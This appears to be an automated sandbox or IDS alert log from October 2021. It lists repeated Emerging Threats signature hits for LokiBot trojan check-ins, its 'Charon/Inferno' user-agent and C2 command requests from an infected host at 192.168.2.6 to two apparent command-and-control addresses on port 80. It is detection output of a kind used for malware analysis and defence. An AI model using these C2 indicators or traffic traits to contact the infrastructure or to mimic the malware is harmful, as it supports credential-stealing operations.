                      10/14/21-08:28:24.885116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.6172.67.219.104
                      10/14/21-08:28:24.885116TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.6172.67.219.104
                      10/14/21-08:28:24.885116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.6172.67.219.104
                      10/14/21-08:28:26.025162TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.6104.21.62.32
                      10/14/21-08:28:26.025162TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.6104.21.62.32
                      10/14/21-08:28:26.025162TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.6104.21.62.32
                      10/14/21-08:28:26.025162TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.6104.21.62.32
                      10/14/21-08:28:27.340972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.6172.67.219.104
                      10/14/21-08:28:27.340972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.6172.67.219.104
                      10/14/21-08:28:27.340972TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.6172.67.219.104
                      10/14/21-08:28:27.340972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.6172.67.219.104
                      10/14/21-08:28:31.397798TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.6172.67.219.104
                      10/14/21-08:28:31.397798TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.6172.67.219.104
                      10/14/21-08:28:31.397798TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.6172.67.219.104
                      10/14/21-08:28:31.397798TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.6172.67.219.104
                      10/14/21-08:28:32.511259TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.6172.67.219.104
                      10/14/21-08:28:33.672462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.6104.21.62.32
                      10/14/21-08:28:33.672462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.6104.21.62.32
                      10/14/21-08:28:33.672462TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.6104.21.62.32
                      10/14/21-08:28:33.672462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.6104.21.62.32
                      10/14/21-08:28:34.890356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.6172.67.219.104
                      10/14/21-08:28:34.890356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.6172.67.219.104
                      10/14/21-08:28:34.890356TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.6172.67.219.104
                      10/14/21-08:28:34.890356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.6172.67.219.104
                      10/14/21-08:28:35.993003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.6172.67.219.104
                      10/14/21-08:28:37.119939TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.6104.21.62.32
                      10/14/21-08:28:37.119939TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.6104.21.62.32
                      10/14/21-08:28:37.119939TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.6104.21.62.32
                      10/14/21-08:28:37.119939TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.6104.21.62.32
                      10/14/21-08:28:38.386394TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.6172.67.219.104
                      10/14/21-08:28:38.386394TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.6172.67.219.104
                      10/14/21-08:28:38.386394TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.6172.67.219.104
                      10/14/21-08:28:38.386394TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.6172.67.219.104
                      10/14/21-08:28:39.512557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.6172.67.219.104
                      10/14/21-08:28:41.105942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.6172.67.219.104
                      10/14/21-08:28:42.274934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.6172.67.219.104
                      10/14/21-08:28:43.873245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.6104.21.62.32
                      10/14/21-08:28:43.873245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.6104.21.62.32
                      10/14/21-08:28:43.873245TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.6104.21.62.32
                      10/14/21-08:28:43.873245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.6104.21.62.32
                      10/14/21-08:28:45.343359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.6172.67.219.104
                      10/14/21-08:28:45.343359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.6172.67.219.104
                      10/14/21-08:28:45.343359TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.6172.67.219.104
                      10/14/21-08:28:45.343359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.6172.67.219.104
                      10/14/21-08:28:48.039638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.6104.21.62.32
                      10/14/21-08:28:48.039638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.6104.21.62.32
                      10/14/21-08:28:48.039638TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.6104.21.62.32
                      10/14/21-08:28:48.039638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.6104.21.62.32
                      10/14/21-08:28:49.659261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.6104.21.62.32
                      10/14/21-08:28:50.976327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.6104.21.62.32
                      10/14/21-08:28:52.327367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.6104.21.62.32
                      10/14/21-08:28:53.563440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.6172.67.219.104
                      10/14/21-08:28:53.563440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.6172.67.219.104
                      10/14/21-08:28:53.563440TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.6172.67.219.104
                      10/14/21-08:28:53.563440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.6172.67.219.104
                      10/14/21-08:28:54.645979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.6104.21.62.32
                      10/14/21-08:28:54.645979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.6104.21.62.32
                      10/14/21-08:28:54.645979TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.6104.21.62.32
                      10/14/21-08:28:54.645979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.6104.21.62.32
                      10/14/21-08:28:56.080095TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.6172.67.219.104
                      10/14/21-08:28:56.080095TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.6172.67.219.104
                      10/14/21-08:28:56.080095TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.6172.67.219.104
                      10/14/21-08:28:56.080095TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.6172.67.219.104
                      10/14/21-08:28:57.516460TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.6172.67.219.104
                      10/14/21-08:28:58.883205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.6172.67.219.104
                      10/14/21-08:29:00.298238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.6172.67.219.104
                      10/14/21-08:29:01.666924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.6172.67.219.104
                      10/14/21-08:29:03.076480TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.6104.21.62.32
                      10/14/21-08:29:03.076480TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.6104.21.62.32
                      10/14/21-08:29:03.076480TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.6104.21.62.32
                      10/14/21-08:29:03.076480TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.6104.21.62.32
                      10/14/21-08:29:06.184636TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.6172.67.219.104
                      10/14/21-08:29:06.184636TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.6172.67.219.104
                      10/14/21-08:29:06.184636TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.6172.67.219.104
                      10/14/21-08:29:06.184636TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.6172.67.219.104
                      10/14/21-08:29:07.530339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.6172.67.219.104
                      10/14/21-08:29:08.722566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.6104.21.62.32
                      10/14/21-08:29:08.722566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.6104.21.62.32
                      10/14/21-08:29:08.722566TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.6104.21.62.32
                      10/14/21-08:29:08.722566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.6104.21.62.32
                      10/14/21-08:29:09.909566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.6104.21.62.32
                      10/14/21-08:29:11.124122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.6172.67.219.104
                      10/14/21-08:29:11.124122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.6172.67.219.104
                      10/14/21-08:29:11.124122TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.6172.67.219.104
                      10/14/21-08:29:11.124122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2025381ET TROJAN LokiBot Checkin4983480192.168.2.6172.67.219.104
                      10/14/21-08:29:12.348796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.6172.67.219.104
                      10/14/21-08:29:13.657085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.6172.67.219.104
                      10/14/21-08:29:15.138022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.6172.67.219.104
                      10/14/21-08:29:16.658468TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.6104.21.62.32
                      10/14/21-08:29:16.658468TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.6104.21.62.32
                      10/14/21-08:29:16.658468TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.6104.21.62.32
                      10/14/21-08:29:16.658468TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.6104.21.62.32
                      10/14/21-08:29:18.009856TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.6104.21.62.32
                      10/14/21-08:29:20.400475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.2.6104.21.62.32
                      10/14/21-08:29:21.825019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.2.6172.67.219.104
                      10/14/21-08:29:21.825019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.6172.67.219.104
                      10/14/21-08:29:21.825019TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.6172.67.219.104
                      10/14/21-08:29:21.825019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.2.6172.67.219.104
                      10/14/21-08:29:23.419826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.6104.21.62.32
                      10/14/21-08:29:23.419826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.6104.21.62.32
                      10/14/21-08:29:23.419826TCP2025381ET TROJAN LokiBot Checkin4987180192.168.2.6104.21.62.32
                      10/14/21-08:29:23.419826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.6104.21.62.32
                      10/14/21-08:29:27.468224TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.2.6172.67.219.104
                      10/14/21-08:29:27.468224TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.2.6172.67.219.104
                      10/14/21-08:29:27.468224TCP2025381ET TROJAN LokiBot Checkin4987280192.168.2.6172.67.219.104
                      10/14/21-08:29:27.468224TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.2.6172.67.219.104
                      10/14/21-08:29:29.646629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.2.6104.21.62.32
                      10/14/21-08:29:29.646629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.2.6104.21.62.32
                      10/14/21-08:29:29.646629TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.6104.21.62.32
                      10/14/21-08:29:29.646629TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.2.6104.21.62.32
                      10/14/21-08:29:31.734477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.2.6172.67.219.104
                      10/14/21-08:29:31.734477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.2.6172.67.219.104
                      10/14/21-08:29:31.734477TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.6172.67.219.104
                      10/14/21-08:29:31.734477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2025381ET TROJAN LokiBot Checkin4987680192.168.2.6172.67.219.104
                      10/14/21-08:29:33.006583TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.2.6172.67.219.104
                      10/14/21-08:29:35.265241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.2.6104.21.62.32
                      10/14/21-08:29:35.265241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.2.6104.21.62.32
                      10/14/21-08:29:35.265241TCP2025381ET TROJAN LokiBot Checkin4987880192.168.2.6104.21.62.32
                      10/14/21-08:29:35.265241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.6104.21.62.32
                      10/14/21-08:29:36.968309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.6104.21.62.32
                      10/14/21-08:29:38.139186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.6104.21.62.32
                      10/14/21-08:29:39.373198TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.6104.21.62.32
                      10/14/21-08:29:40.707681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.6172.67.219.104
                      10/14/21-08:29:40.707681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.6172.67.219.104
                      10/14/21-08:29:40.707681TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.6172.67.219.104
                      10/14/21-08:29:40.707681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.6172.67.219.104
                      10/14/21-08:29:41.873661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.2.6104.21.62.32
                      10/14/21-08:29:41.873661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.2.6104.21.62.32
                      10/14/21-08:29:41.873661TCP2025381ET TROJAN LokiBot Checkin4991080192.168.2.6104.21.62.32
                      10/14/21-08:29:41.873661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2025381ET TROJAN LokiBot Checkin4991180192.168.2.6104.21.62.32
                      10/14/21-08:29:43.281959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.2.6104.21.62.32
                      10/14/21-08:29:44.429017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.2.6172.67.219.104
                      10/14/21-08:29:44.429017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.2.6172.67.219.104
                      10/14/21-08:29:44.429017TCP2025381ET TROJAN LokiBot Checkin4991280192.168.2.6172.67.219.104
                      10/14/21-08:29:44.429017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2025381ET TROJAN LokiBot Checkin4991380192.168.2.6172.67.219.104
                      10/14/21-08:29:45.763145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2025381ET TROJAN LokiBot Checkin4991480192.168.2.6172.67.219.104
                      10/14/21-08:29:46.923367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2025381ET TROJAN LokiBot Checkin4991580192.168.2.6172.67.219.104
                      10/14/21-08:29:48.049871TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2025381ET TROJAN LokiBot Checkin4991680192.168.2.6172.67.219.104
                      10/14/21-08:29:49.324402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.2.6172.67.219.104
                      10/14/21-08:29:51.880554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.2.6104.21.62.32
                      10/14/21-08:29:51.880554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.2.6104.21.62.32
                      10/14/21-08:29:51.880554TCP2025381ET TROJAN LokiBot Checkin4991880192.168.2.6104.21.62.32
                      10/14/21-08:29:51.880554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.2.6104.21.62.32
                      10/14/21-08:29:55.836603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.2.6172.67.219.104
                      10/14/21-08:29:55.836603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.2.6172.67.219.104
                      10/14/21-08:29:55.836603TCP2025381ET TROJAN LokiBot Checkin4992180192.168.2.6172.67.219.104
                      10/14/21-08:29:55.836603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.2.6172.67.219.104
                      10/14/21-08:29:56.968340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.2.6104.21.62.32
                      10/14/21-08:29:56.968340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.2.6104.21.62.32
